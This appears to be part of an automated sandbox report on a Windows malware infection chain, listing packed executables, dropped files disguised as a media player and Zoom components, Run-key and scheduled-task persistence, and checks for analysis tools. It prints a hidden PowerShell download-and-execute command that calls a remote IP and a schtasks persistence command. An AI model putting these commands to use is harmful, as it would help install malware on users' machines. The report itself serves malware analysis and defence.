Source: stail[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x3886e4
Source: random[1].exe0.10.dr Static PE information: real checksum: 0x1e4f75 should be: 0x1ea13b
Source: is-T56MS.tmp.30.dr Static PE information: real checksum: 0x0 should be: 0x73dfcd
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: real checksum: 0x1d58e1 should be: 0x1d6862
Source: random[2].exe.10.dr Static PE information: real checksum: 0x1c1351 should be: 0x1c437b
Source: tYrnx75.exe.10.dr Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: 8fb472f3d3.exe.10.dr Static PE information: real checksum: 0x1c7038 should be: 0x1c56ad
Source: LCESjzR.tmp.29.dr Static PE information: real checksum: 0x0 should be: 0x357c1c
Source: ugdKEDU[1].exe.10.dr Static PE information: real checksum: 0x42662 should be: 0x614a4
Source: skotes.exe.3.dr Static PE information: real checksum: 0x1d58e1 should be: 0x1d6862
Source: ugdKEDU.exe.10.dr Static PE information: real checksum: 0x42662 should be: 0x614a4
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name:
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name: .idata
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name:
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name: hxbwlokj
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name: fwohzanq
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name: .taggant
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: hxbwlokj
Source: skotes.exe.3.dr Static PE information: section name: fwohzanq
Source: skotes.exe.3.dr Static PE information: section name: .taggant
Source: 4db43293bc.exe.10.dr Static PE information: section name:
Source: 4db43293bc.exe.10.dr Static PE information: section name: .idata
Source: 4db43293bc.exe.10.dr Static PE information: section name:
Source: 4db43293bc.exe.10.dr Static PE information: section name: ooydwvsw
Source: 4db43293bc.exe.10.dr Static PE information: section name: lonnmldt
Source: 4db43293bc.exe.10.dr Static PE information: section name: .taggant
Source: random[1].exe0.10.dr Static PE information: section name:
Source: random[1].exe0.10.dr Static PE information: section name: .idata
Source: random[1].exe0.10.dr Static PE information: section name:
Source: random[1].exe0.10.dr Static PE information: section name: nmmtmocg
Source: random[1].exe0.10.dr Static PE information: section name: yvxloaht
Source: random[1].exe0.10.dr Static PE information: section name: .taggant
Source: b191a8c87b.exe.10.dr Static PE information: section name:
Source: b191a8c87b.exe.10.dr Static PE information: section name: .idata
Source: b191a8c87b.exe.10.dr Static PE information: section name:
Source: b191a8c87b.exe.10.dr Static PE information: section name: nmmtmocg
Source: b191a8c87b.exe.10.dr Static PE information: section name: yvxloaht
Source: b191a8c87b.exe.10.dr Static PE information: section name: .taggant
Source: random[1].exe1.10.dr Static PE information: section name:
Source: random[1].exe1.10.dr Static PE information: section name: .idata
Source: random[1].exe1.10.dr Static PE information: section name:
Source: random[1].exe1.10.dr Static PE information: section name: jttzozln
Source: random[1].exe1.10.dr Static PE information: section name: dydxuimv
Source: random[1].exe1.10.dr Static PE information: section name: .taggant
Source: 8fb472f3d3.exe.10.dr Static PE information: section name:
Source: 8fb472f3d3.exe.10.dr Static PE information: section name: .idata
Source: 8fb472f3d3.exe.10.dr Static PE information: section name:
Source: 8fb472f3d3.exe.10.dr Static PE information: section name: jttzozln
Source: 8fb472f3d3.exe.10.dr Static PE information: section name: dydxuimv
Source: 8fb472f3d3.exe.10.dr Static PE information: section name: .taggant
Source: random[2].exe.10.dr Static PE information: section name:
Source: random[2].exe.10.dr Static PE information: section name: .idata
Source: random[2].exe.10.dr Static PE information: section name:
Source: random[2].exe.10.dr Static PE information: section name: pddznxyl
Source: random[2].exe.10.dr Static PE information: section name: kbgcpuhd
Source: random[2].exe.10.dr Static PE information: section name: .taggant
Source: 0269e2f5f3.exe.10.dr Static PE information: section name:
Source: 0269e2f5f3.exe.10.dr Static PE information: section name: .idata
Source: 0269e2f5f3.exe.10.dr Static PE information: section name:
Source: 0269e2f5f3.exe.10.dr Static PE information: section name: pddznxyl
Source: 0269e2f5f3.exe.10.dr Static PE information: section name: kbgcpuhd
Source: 0269e2f5f3.exe.10.dr Static PE information: section name: .taggant
Source: LCESjzR[1].exe.10.dr Static PE information: section name: .didata
Source: LCESjzR.exe.10.dr Static PE information: section name: .didata
Source: random[1].exe2.10.dr Static PE information: section name:
Source: random[1].exe2.10.dr Static PE information: section name: .idata
Source: random[1].exe2.10.dr Static PE information: section name:
Source: random[1].exe2.10.dr Static PE information: section name: ooydwvsw
Source: random[1].exe2.10.dr Static PE information: section name: lonnmldt
Source: random[1].exe2.10.dr Static PE information: section name: .taggant
Source: LCESjzR.tmp.29.dr Static PE information: section name: .didata
Source: is-LV70G.tmp.30.dr Static PE information: section name: .rodata
Source: is-LV70G.tmp.30.dr Static PE information: section name: _RDATA
Source: is-RCAI0.tmp.30.dr Static PE information: section name: .rodata
Source: is-RCAI0.tmp.30.dr Static PE information: section name: _RDATA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 10_2_009AD91C push ecx; ret 10_2_009AD92F
Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Code function: 28_2_00940DE6 push ecx; ret 28_2_00940DF9
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Code function: 31_2_02A47BA6 push ecx; ret 31_2_02A47BB2
Source: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Code function: 31_2_02A43EAA push cs; retf 31_2_02A43EB9
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name: entropy: 7.984515340873373
Source: TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE.1.dr Static PE information: section name: hxbwlokj entropy: 7.9540477201720305
Source: skotes.exe.3.dr Static PE information: section name: entropy: 7.984515340873373
Source: skotes.exe.3.dr Static PE information: section name: hxbwlokj entropy: 7.9540477201720305
Source: 4db43293bc.exe.10.dr Static PE information: section name: entropy: 7.984684993420552
Source: 4db43293bc.exe.10.dr Static PE information: section name: ooydwvsw entropy: 7.953312463989029
Source: random[1].exe0.10.dr Static PE information: section name: nmmtmocg entropy: 7.948413942256694
Source: b191a8c87b.exe.10.dr Static PE information: section name: nmmtmocg entropy: 7.948413942256694
Source: random[1].exe1.10.dr Static PE information: section name: entropy: 7.983433942739773
Source: random[1].exe1.10.dr Static PE information: section name: jttzozln entropy: 7.952943070586376
Source: 8fb472f3d3.exe.10.dr Static PE information: section name: entropy: 7.983433942739773
Source: 8fb472f3d3.exe.10.dr Static PE information: section name: jttzozln entropy: 7.952943070586376
Source: random[2].exe.10.dr Static PE information: section name: pddznxyl entropy: 7.953056308834811
Source: 0269e2f5f3.exe.10.dr Static PE information: section name: pddznxyl entropy: 7.953056308834811
Source: random[1].exe2.10.dr Static PE information: section name: entropy: 7.984684993420552
Source: random[1].exe2.10.dr Static PE information: section name: ooydwvsw entropy: 7.953312463989029
Source: ugdKEDU[1].exe.10.dr, SX7VHXsUw02CIOBEHMt.cs High entropy of concatenated method names: 'yPnsD4TnOx', 'dXusyMG1aA', 'o3ismIfVR8', 'kP1sEIhXrK', 'mqfska4Qvx', 'C36sotIQsQ', 'rRasPCPoK8', 'sBqs8LZ6Rt', 'nPqs79L3Nh', 'FFrsbQX4xG'
Source: ugdKEDU[1].exe.10.dr, QcapXlsQaOUTcM6d72A.cs High entropy of concatenated method names: 'XxeM7tarU5', 'vinMbvFplH', 'cViMQb2cJK', 'u9uMv6dVWb', 'MLbMViHlSa', 'FomMifG1RJ', 'LtkMA23hmd', 'bxaXX4VaGP', 'qg9MSmYjxU', 'quVMBikCSy'
Source: ugdKEDU[1].exe.10.dr, T4D7CLsdBY5USblHXPJ.cs High entropy of concatenated method names: 'G7d1a0Fg4E', 'QW8QRVdM9XhwD4KOpJ0', 'peIfPNdNCG1d3DZTxSe', 'tTJfgtdukweQE8CgfnF', 'cM23bAdxoF512v5GYph', 'MWmxkkdc2ljstBYdFqI'
Source: ugdKEDU[1].exe.10.dr, WS36uhldRk15BMqR9l.cs High entropy of concatenated method names: 'WafGmnTa34nDiqJLIUu', 'sNkakTTqkS3CcudO9wQ', 'tWmg2rjfPX', 'rQ7XTBTG9J2qD190dlr', 'fHWlxHTOrZ80BKuh86A', 'WiRsW5T4Jm2UFiKVXmh', 'Y3sBLUTtw3jwZSiZsYl', 'nW4lBacjpc', 'BRLsfrdFc8', 'tHFsgjAiBB'
Source: ugdKEDU.exe.10.dr, SX7VHXsUw02CIOBEHMt.cs High entropy of concatenated method names: 'yPnsD4TnOx', 'dXusyMG1aA', 'o3ismIfVR8', 'kP1sEIhXrK', 'mqfska4Qvx', 'C36sotIQsQ', 'rRasPCPoK8', 'sBqs8LZ6Rt', 'nPqs79L3Nh', 'FFrsbQX4xG'
Source: ugdKEDU.exe.10.dr, QcapXlsQaOUTcM6d72A.cs High entropy of concatenated method names: 'XxeM7tarU5', 'vinMbvFplH', 'cViMQb2cJK', 'u9uMv6dVWb', 'MLbMViHlSa', 'FomMifG1RJ', 'LtkMA23hmd', 'bxaXX4VaGP', 'qg9MSmYjxU', 'quVMBikCSy'
Source: ugdKEDU.exe.10.dr, T4D7CLsdBY5USblHXPJ.cs High entropy of concatenated method names: 'G7d1a0Fg4E', 'QW8QRVdM9XhwD4KOpJ0', 'peIfPNdNCG1d3DZTxSe', 'tTJfgtdukweQE8CgfnF', 'cM23bAdxoF512v5GYph', 'MWmxkkdc2ljstBYdFqI'
Source: ugdKEDU.exe.10.dr, WS36uhldRk15BMqR9l.cs High entropy of concatenated method names: 'WafGmnTa34nDiqJLIUu', 'sNkakTTqkS3CcudO9wQ', 'tWmg2rjfPX', 'rQ7XTBTG9J2qD190dlr', 'fHWlxHTOrZ80BKuh86A', 'WiRsW5T4Jm2UFiKVXmh', 'Y3sBLUTtw3jwZSiZsYl', 'nW4lBacjpc', 'BRLsfrdFc8', 'tHFsgjAiBB'
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, SX7VHXsUw02CIOBEHMt.cs High entropy of concatenated method names: 'yPnsD4TnOx', 'dXusyMG1aA', 'o3ismIfVR8', 'kP1sEIhXrK', 'mqfska4Qvx', 'C36sotIQsQ', 'rRasPCPoK8', 'sBqs8LZ6Rt', 'nPqs79L3Nh', 'FFrsbQX4xG'
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, QcapXlsQaOUTcM6d72A.cs High entropy of concatenated method names: 'XxeM7tarU5', 'vinMbvFplH', 'cViMQb2cJK', 'u9uMv6dVWb', 'MLbMViHlSa', 'FomMifG1RJ', 'LtkMA23hmd', 'bxaXX4VaGP', 'qg9MSmYjxU', 'quVMBikCSy'
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, T4D7CLsdBY5USblHXPJ.cs High entropy of concatenated method names: 'G7d1a0Fg4E', 'QW8QRVdM9XhwD4KOpJ0', 'peIfPNdNCG1d3DZTxSe', 'tTJfgtdukweQE8CgfnF', 'cM23bAdxoF512v5GYph', 'MWmxkkdc2ljstBYdFqI'
Source: 31.2.ugdKEDU.exe.3c19550.0.raw.unpack, WS36uhldRk15BMqR9l.cs High entropy of concatenated method names: 'WafGmnTa34nDiqJLIUu', 'sNkakTTqkS3CcudO9wQ', 'tWmg2rjfPX', 'rQ7XTBTG9J2qD190dlr', 'fHWlxHTOrZ80BKuh86A', 'WiRsW5T4Jm2UFiKVXmh', 'Y3sBLUTtw3jwZSiZsYl', 'nW4lBacjpc', 'BRLsfrdFc8', 'tHFsgjAiBB'

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com File created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Jump to dropped file
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d; Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053670001\8fb472f3d3.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libGLESv2.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5PrintSupport.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053669001\b191a8c87b.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-7SCO6.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcr100.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\is-8C04K.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\jrgXmS0[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp File created: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ugdKEDU[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[2].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp File created: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\driver3.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1051791001\tYrnx75.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuin51.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-JO5R4.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-9J3SL.tmp Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053672001\c9cd3322a0.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\sqlite3.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053014001\ugdKEDU.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053662101\1e9cc73e62.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libEGL.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp File created: C:\Users\user\AppData\Roaming\ZoomUs\Nda0ProtocolZoom.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-LGLQ2.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053579001\4db43293bc.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com File created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp File created: C:\Users\user\AppData\Roaming\ZoomUs\is-LV70G.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe File created: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp File created: C:\Users\user\AppData\Roaming\ZoomUs\EOSSDK-Win64-Shipping.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-U772O.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\LCESjzR[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe File created: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcp100.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Temp\is-5IJJ6.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053063001\jrgXmS0.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1053476001\stail.exe File created: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-NNPOE.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tYrnx75[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-O3JN0.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp File created: C:\Users\user\AppData\Local\Temp\is-9JA86.tmp\is-T56MS.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\stail[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-MJUM6.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Temp\is-5IJJ6.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Temp\is-5IJJ6.tmp\_isetup\_iscrypt.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuuc51.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5Concurrent.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053671001\0269e2f5f3.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-SQAGT.tmp\stail.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-R7PP0.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1052838001\LCESjzR.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\567757\Appeal.com Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-J61GD.tmp\LCESjzR.tmp File created: C:\Users\user\AppData\Roaming\ZoomUs\is-RCAI0.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe File created: C:\ProgramData\CrossPlatformPlayer\sqlite3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe File created: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe Jump to dropped file

Boot Survival

Source: Yara match File source: 23.3.Macromedia.com.4245ad0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.Macromedia.com.4245ad0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000003.3327002256.0000000004251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3320167416.000000000423A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.3320167416.00000000041CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Macromedia.com PID: 6872, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1e9cc73e62.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8fb472f3d3.exe Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1e9cc73e62.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd Jump to behavior
